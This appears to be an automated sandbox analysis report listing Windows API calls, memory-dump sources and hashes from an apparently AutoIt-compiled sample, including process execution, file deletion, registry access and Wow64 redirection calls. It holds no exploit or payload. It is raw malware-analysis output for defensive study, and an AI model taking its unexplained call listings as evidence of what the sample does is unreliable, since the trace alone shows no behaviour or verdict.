                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                      • String ID: 0
                                                      • API String ID: 1227352736-4108050209
                                                      • Opcode ID: d07e9232e3157cf05b12676f9f427e3b6a045e3fbe86b074b3efcf82337d76a6
                                                      • Instruction ID: a8b5d23f23e3ec9c6a60ebe03174c24754a5029abd66c019be77e114fcc94a91
                                                      • Opcode Fuzzy Hash: d07e9232e3157cf05b12676f9f427e3b6a045e3fbe86b074b3efcf82337d76a6
                                                      • Instruction Fuzzy Hash: 8D5101716043009BDB14AF78C885BABB7E4AF89718F242A2EF995F31D1DB70D844DB52
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00EBAEA3
                                                        • Part of subcall function 00E37620: _wcslen.LIBCMT ref: 00E37625
                                                      • GetProcessId.KERNEL32(00000000), ref: 00EBAF38
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBAF67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                      • String ID: <$@
                                                      • API String ID: 146682121-1426351568
                                                      • Opcode ID: 8de955b929acd44554095d715c895c4ac8aa22387b384c467cce3ab85fdb0be8
                                                      • Instruction ID: d3ee41e7a9866cc533b0021c8c81e84e4bbe3694a1d806244564874498fa5436
                                                      • Opcode Fuzzy Hash: 8de955b929acd44554095d715c895c4ac8aa22387b384c467cce3ab85fdb0be8
                                                      • Instruction Fuzzy Hash: BE716571A00219DFCF14DF54C488A9EBBF1AF08314F0894A9E856BB262CB75ED85CB91
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E97206
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E9723C
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E9724D
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E972CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 15364708f04dbd8018f44c0ffec9e8bd9e785cc708f0723678af48de6655a3a2
                                                      • Instruction ID: 0e2a1bc51939ef59085c30aa4badecbd4ad55e44d005902e1f3eed27ff37c9bd
                                                      • Opcode Fuzzy Hash: 15364708f04dbd8018f44c0ffec9e8bd9e785cc708f0723678af48de6655a3a2
                                                      • Instruction Fuzzy Hash: DC41BEB1624204EFDF15CF54C884A9A7BB9EF44700F2490A9FD49AF21AD7B1DD09CBA0
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC3E35
                                                      • IsMenu.USER32(?), ref: 00EC3E4A
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC3E92
                                                      • DrawMenuBar.USER32 ref: 00EC3EA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert
                                                      • String ID: 0
                                                      • API String ID: 3076010158-4108050209
                                                      • Opcode ID: 01b440bc3932eba94c69fb0406f4f1e27af8421973303d23c961e3fa7d059690
                                                      • Instruction ID: ea49bf017d907119d10204594651271bb70ebe719f6be096d820960692416b12
                                                      • Opcode Fuzzy Hash: 01b440bc3932eba94c69fb0406f4f1e27af8421973303d23c961e3fa7d059690
                                                      • Instruction Fuzzy Hash: 60415975A00309AFDB10DF60D984EEABBB5FF49354F04912DE905A7250D732AE56CF60
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E91E66
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E91E79
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E91EA9
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 2081771294-1403004172
                                                      • Opcode ID: 645a2d7ad34715642440c6747e3dd1e095484c97fe61521f51589b2b087bc5da
                                                      • Instruction ID: 4c0d18877a5a0fd8ca4ade6e5fbe317fd86f7e20e7dff7b0ecfb346e345eb6fe
                                                      • Opcode Fuzzy Hash: 645a2d7ad34715642440c6747e3dd1e095484c97fe61521f51589b2b087bc5da
                                                      • Instruction Fuzzy Hash: 1121F375A00204BEDF14AB64DD4ACFFBBB8DF45364F106129F925B71E1DB75490AC620
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EC2F8D
                                                      • LoadLibraryW.KERNEL32(?), ref: 00EC2F94
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EC2FA9
                                                      • DestroyWindow.USER32(?), ref: 00EC2FB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                      • String ID: SysAnimate32
                                                      • API String ID: 3529120543-1011021900
                                                      • Opcode ID: 4334a187da547784970e49c3faa564058ac91e91728a15ab0fb6bb8999f4611b
                                                      • Instruction ID: 3c6a5d4a4c029f61379558204a5b0ed6798fa633923612282d4efa3f7fb935b3
                                                      • Opcode Fuzzy Hash: 4334a187da547784970e49c3faa564058ac91e91728a15ab0fb6bb8999f4611b
                                                      • Instruction Fuzzy Hash: 07219A71200249AFEB218F64DD80FBB77B9EB59368F10622CFA50F21A0D772DC529760
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E54D1E,00E628E9,(,00E54CBE,00000000,00EF88B8,0000000C,00E54E15,(,00000002), ref: 00E54D8D
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E54DA0
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00E54D1E,00E628E9,(,00E54CBE,00000000,00EF88B8,0000000C,00E54E15,(,00000002,00000000), ref: 00E54DC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 7e86bcf980adf06b536c4ddafd4fa66722a1a5414c2aee7b545a6d0578c8c24e
                                                      • Instruction ID: 6c7a08dbddb5cd68b30f331151325bf04cbca5d422e48e76cf3ba1413a23969f
                                                      • Opcode Fuzzy Hash: 7e86bcf980adf06b536c4ddafd4fa66722a1a5414c2aee7b545a6d0578c8c24e
                                                      • Instruction Fuzzy Hash: AEF0AF30A00208BFDB109F92DC09FAEBFB4EF44716F1400A5FC09B22A0CB31598ACB91
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E34EDD,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E9C
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E34EAE
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00E34EDD,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34EC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-3689287502
                                                      • Opcode ID: 0e773d52db0f5524a2ceb94467463ba7aa172d9d6fc9a4d3607a462b790f3924
                                                      • Instruction ID: 1320b2e5d9eb6334821d303835137106d48393034919958301510b875bc1b858
                                                      • Opcode Fuzzy Hash: 0e773d52db0f5524a2ceb94467463ba7aa172d9d6fc9a4d3607a462b790f3924
                                                      • Instruction Fuzzy Hash: 0BE08635A026225F922117276C1CF6B6964AF81B66B191125FD08F6150DB61DD0780A1
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E73CDE,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E62
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E34E74
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00E73CDE,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E87
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-1355242751
                                                      • Opcode ID: c3ddc4b56d93559ede6de1bc426cad4da347576a20879e24c2a3d61cb38f28a8
                                                      • Instruction ID: bb4bef91bd528c039ad1e06048ae0aa905cd8c7d79b0a9170a3a46e41fa586c4
                                                      • Opcode Fuzzy Hash: c3ddc4b56d93559ede6de1bc426cad4da347576a20879e24c2a3d61cb38f28a8
                                                      • Instruction Fuzzy Hash: C9D0C2329036215B47221B27AC0CEAB2E28AF81F153191524F908B6150CF22CD07C1D0
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA2C05
                                                      • DeleteFileW.KERNEL32(?), ref: 00EA2C87
                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EA2C9D
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA2CAE
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA2CC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$Copy
                                                      • String ID:
                                                      • API String ID: 3226157194-0
                                                      • Opcode ID: 6233ec31e887e0579edcd96e01329ea4b75e68277b2593ae7ed2ff72895160a1
                                                      • Instruction ID: 7b52d8aa12fd6c666260f2ee8cf0a548c9dedb07240765ea66761d5587d90436
                                                      • Opcode Fuzzy Hash: 6233ec31e887e0579edcd96e01329ea4b75e68277b2593ae7ed2ff72895160a1
                                                      • Instruction Fuzzy Hash: 13B16072D00119ABDF25DBA4CC85EDEBBBDEF09310F1050AAF609F6151EA31AA44CF61
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 00EBA427
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EBA435
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EBA468
                                                      • CloseHandle.KERNEL32(?), ref: 00EBA63D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                      • String ID:
                                                      • API String ID: 3488606520-0
                                                      • Opcode ID: 93b1b1636a19865079a8eff46332a825a8cf3d9cc4fed255e598e9b34fa79d19
                                                      • Instruction ID: 167c61f5de4218c13581b11b10d577dce9fa0619d12ae6ff9a999dd28e2df005
                                                      • Opcode Fuzzy Hash: 93b1b1636a19865079a8eff46332a825a8cf3d9cc4fed255e598e9b34fa79d19
                                                      • Instruction Fuzzy Hash: E7A1A471604300AFD720DF24D886F6AB7E5AF84714F18986DF59AAB292D770EC41CB92
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00ED3700), ref: 00E6BB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00E6BC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F01270,000000FF,?,0000003F,00000000,?), ref: 00E6BC36
                                                      • _free.LIBCMT ref: 00E6BB7F
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E6BD4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 1286116820-0
                                                      • Opcode ID: 8b26456cfe07bb1b708ed6ad6c354100f87422ddc5d13491a6659f4c8bc39adb
                                                      • Instruction ID: 727ae476e45e3f5fbaef47ef0c2a3fb2fe6d5e5c967730eccf308ac8f4618c3a
                                                      • Opcode Fuzzy Hash: 8b26456cfe07bb1b708ed6ad6c354100f87422ddc5d13491a6659f4c8bc39adb
                                                      • Instruction Fuzzy Hash: B851E871980209EFDB10EF65AC819AEB7FCFF80394B10526AE554F7291EB709E81DB50
                                                      APIs
                                                        • Part of subcall function 00E9DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E9CF22,?), ref: 00E9DDFD
                                                        • Part of subcall function 00E9DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E9CF22,?), ref: 00E9DE16
                                                        • Part of subcall function 00E9E199: GetFileAttributesW.KERNEL32(?,00E9CF95), ref: 00E9E19A
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E9E473
                                                      • MoveFileW.KERNEL32(?,?), ref: 00E9E4AC
                                                      • _wcslen.LIBCMT ref: 00E9E5EB
                                                      • _wcslen.LIBCMT ref: 00E9E603
                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E9E650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                      • String ID:
                                                      • API String ID: 3183298772-0
                                                      • Opcode ID: d6dd416252def3219e41b458dc7bb767f2d17069aec952d4aba32eeacb20dca0
                                                      • Instruction ID: 94ab035ce56df78761ea6efb7fd6e5ba4754ee5e3661fff99f18f583b066883d
                                                      • Opcode Fuzzy Hash: d6dd416252def3219e41b458dc7bb767f2d17069aec952d4aba32eeacb20dca0
                                                      • Instruction Fuzzy Hash: 1A5162B24083459BCB24DB90D8819DFB7ECAF84344F10591EF689E3292EF75A588C766
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00EBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBB6AE,?,?), ref: 00EBC9B5
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBC9F1
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA68
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBBAA5
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBBB00
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EBBB63
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00EBBBA6
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EBBBB3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 826366716-0
                                                      • Opcode ID: 7ddacf06374ee22c402060d328e5bb196b89a25bd30fa0ba0aa66d165bf487ba
                                                      • Instruction ID: b104485fe8c4170cb8a566c8b1a3706b04122028dc9346b179adb9caa284e1bf
                                                      • Opcode Fuzzy Hash: 7ddacf06374ee22c402060d328e5bb196b89a25bd30fa0ba0aa66d165bf487ba
                                                      • Instruction Fuzzy Hash: 5C61AE31208201AFD314DF14C895E6BBBE5FF84308F14A56CF499AB2A2CB71ED45CB92
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00E98BCD
                                                      • VariantClear.OLEAUT32 ref: 00E98C3E
                                                      • VariantClear.OLEAUT32 ref: 00E98C9D
                                                      • VariantClear.OLEAUT32(?), ref: 00E98D10
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E98D3B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType
                                                      • String ID:
                                                      • API String ID: 4136290138-0
                                                      • Opcode ID: 2ae6cf5d42e082bd6786f2599f563c0c9f51368b314a591bb29ff5c0adc85752
                                                      • Instruction ID: b0a6fa1f842b417d24b1544fa93c86e7b0739f58bf0bd882af6b7c5559293c8a
                                                      • Opcode Fuzzy Hash: 2ae6cf5d42e082bd6786f2599f563c0c9f51368b314a591bb29ff5c0adc85752
                                                      • Instruction Fuzzy Hash: F0515CB5A00219DFCB14CF68C894EAAB7F9FF89314B158559E919EB350D730E911CB90
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EA8BAE
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00EA8BDA
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EA8C32
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EA8C57
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EA8C5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
